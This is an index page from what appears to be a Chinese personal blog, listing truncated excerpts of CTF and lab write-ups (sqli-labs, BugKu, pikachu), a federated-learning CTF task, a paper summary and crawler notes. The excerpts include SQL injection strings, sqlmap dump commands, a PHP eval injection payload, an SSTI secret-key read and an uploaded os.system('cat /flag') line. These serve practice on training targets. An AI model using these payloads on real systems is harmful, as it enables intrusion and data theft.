sqli-labs 刷题记录
sqli-labs 刷题记录
参考:
MYSQL注入天书
此文尽量使用手工注入以加深对原理的理解,竭力避免了使用sqlmap或者脚本自动化注入等方式。
Page-1 (Basic Challenges)Less-1 GET - Error based - Single quotes - String (基于错误的GET单引号字符型注入)手动注入进去之后发现让输入id,随便输一个数字id发现都可以正常回显,然后尝试注入
http://127.0.0.1:8081/sqli-labs/Less-1/?id=1'
根据报错信息猜测原语句是用'$id'来处理的输入,故用'闭合即可。
http://127.0.0.1:8081/sqli-labs/Less-1/?id=1' or 1=1--+
正常回显,故用order by爆出列数,发现有3列(4时报错)
http://127.0.0.1:8081/sqli-labs/Less-1/?id=1' order by 4--+
然后开始爆库名
http://127.0.0.1:808 ...
BugKu Web 刷题记录 4
BugKu Web 刷题记录 4
参考:
ctf中的序列化和反序列化
BugKu-Web-wp1
BugKu-Web-wp2
BugKu-Web-wp3
Bugku-Web-wp4
sql注入
你从哪里来添加Referer字段即可。
MD5根据提示得知是md5碰撞,故构造payload如下即可获得flag。
http://114.67.175.224:14728/index.php?a=s878926199a
程序员本地网站添加client-ip字段即可
file_get_contents访问http://114.67.175.224:12650/flag.txt得到bugku,然后构造payload即可
http://114.67.175.224:12650/?ac=bugku&fn=flag.txt
安慰奖F12查看源码,发现base64编码,解码后为backups,用dirsearch扫描一遍发现有bak文件,下载下来即可获得源码
<?phpheader("Content-Type: text/html;charset=utf-8") ...
BugKu Web 刷题记录3
BugKu Web 刷题记录3
参考:
PHP程序执行
BugKu-Web-wp1
BugKu-Web-wp2
BugKu-Web-wp3
game1一局游戏结束后,发现抓到了一个可疑的数据包
猜测sign字段是base64加密的,但解码后发现是无用字符,又对score字段尝试base64加密,发现25的base64码是MjU=,故猜测sign字段本质上是不是'zM'+'base64_encode(score)'+'=='这样组成的,发送后发现确实可以得到flag
eval方法1先试试传入全局变量看看其中内容
http://114.67.175.224:13624/?hello=$GLOBALS
很好,被嘲讽了。eval会执行传入字符串,故构造payload让其执行命令
http://114.67.175.224:13624/?hello=);show_source('flag.php');var_dump(
方法2也可以直接使用file
http://114.67.175.224:13624/?hell ...
BugKu Web 刷题记录2
BugKu Web 刷题记录2
参考:
BugKu-Web-wp1
BugKu-Web-wp2
get-shell-wp1
get-shell-wp2
成绩查询使用sqlmap进行注入
python sqlmap.py -u http://114.67.175.224:16892/ --forms --dbs
发现爆出来四个数据库名字
其中skctf很可疑,去爆其中表名
python sqlmap.py -u http://114.67.175.224:16892/ --forms --dbs -D skctf --tables
可以猜测,flag就在f14g中,故去爆其中字段
python sqlmap.py -u http://114.67.175.224:16892/ --forms --dbs -D skctf -T fl4g --columns
可以看到,fl4g表中有一个名为skctf_flag字段,得到其字段信息即可。
python sqlmap.py -u http://114.67.175.224:16892/ --forms --dbs -D skct ...
BugKu Web 刷题记录1
BugKu Web 刷题记录1
参考:
BugKu-Web-wp1
BugKu-Web-wp2
BugKu-Web-wp3
flask之ssti模版注入从零到入门
Simple_SSTI_1F12查看源码
输入
http://114.67.175.224:17350/?flag={{config.SECRET_KEY}}
Simple_SSTI_2
Flask_FileUpload创建111.txt并输入
import osos.system('cat /flag')
修改文件名为111.jpg后上传文件即可得到flag
滑稽
F12后,ctrl+f搜索flag即可
计算器F12,修改长度限制,随后输入正确计算结果即可。
GET
POST
矛盾第一个条件是不能为数字,第二个条件是==比较,和整型比较是会先把字符串转化为整型,’1admin’在比较时候会变成1
alert查看源代码
放到html中显示
你必须让他停下burp suite抓包
变量1关键在于这一句
eval(" ...
pikachu靶场刷题记录
CTF Web pikachu靶场记录
简单记录下pikachu靶场刷题历程
参考资料:
全程讲解视频
pikachu靶场wp1
pikachu靶场wp2
靶场环境配置
可以参照本篇博客:https://www.webxlab.net/article/detail/OmAE5oMAar
初始界面如下:
暴力破解使用burp suite即可
burpsuite无法拦截本地包:https://blog.csdn.net/qq_38923350/article/details/112497437?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_antiscanv2&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_antisc ...
2022StarCTF-Misc-babyFL
2022 *CTF Misc babyFL WP(AI安全)题目描述:
源码链接:
链接:https://pan.baidu.com/s/14eOkeEAxO5byopzZhgyh8A提取码:pl5w
推荐使用jupyter
题目分析:先看源码
if __name__ == '__main__': try: if not os.path.exists('/home/ctf/model'): os.mkdir("/home/ctf/model") train_models() #训练模型 parameters = load_parameters() #加载正确识别的模型的参数 parameters = get_input_parameter(parameters) #添加自己输入的权重 model = aggregation(parameters) #用更新后的权重组合更新模型 test(model) # ...
Auto-Traffic-Analysis
New Directions in Automated Traffic Analysis论文学习
论文链接:New Directions in Automated Traffic Analysis | Proceedings of the 2021 ACM SIGSAC Conference on Computer and Communications Security
文章主要信息
论文名称
New Directions in Automated Traffic Analysis
录用信息
CCS 2021(CCF-A)
作者
Jordan Holland, Paul Schmitt, Nick Feamster, Prateek Mittal
论文链接
https://dl.acm.org/doi/10.1145/3460120.3484758
源码
https://github.com/nprint/nprint
数据集
https://drive.google.com/drive/folders/158Lwb9TwopIJ0lGPuFik5744 ...
python爬虫
Python爬虫学习整理了一下以前写过的一些小爬虫。
12306查票# 12306Check.pyimport requestsimport pandas as pdimport json# 反复查询加循环即可f = open('stations.json',mode='r',encoding='utf-8')text = f.read()city_json = json.loads(text)f.close()from_station = input('始发站:')to_station = input('终点站:')train_date = input('发车日期(格式:2022-04-03):')# from_station = '武汉'# to_station = '长沙'# train_date = '2022-04-06'# print(city_json[from_station])# print ...
Hello World
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
Quick StartCreate a new post$ hexo new "My New Post"
More info: Writing
Run server$ hexo server
More info: Server
Generate static files$ hexo generate
More info: Generating
Deploy to remote sites$ hexo deploy
More info: Deployment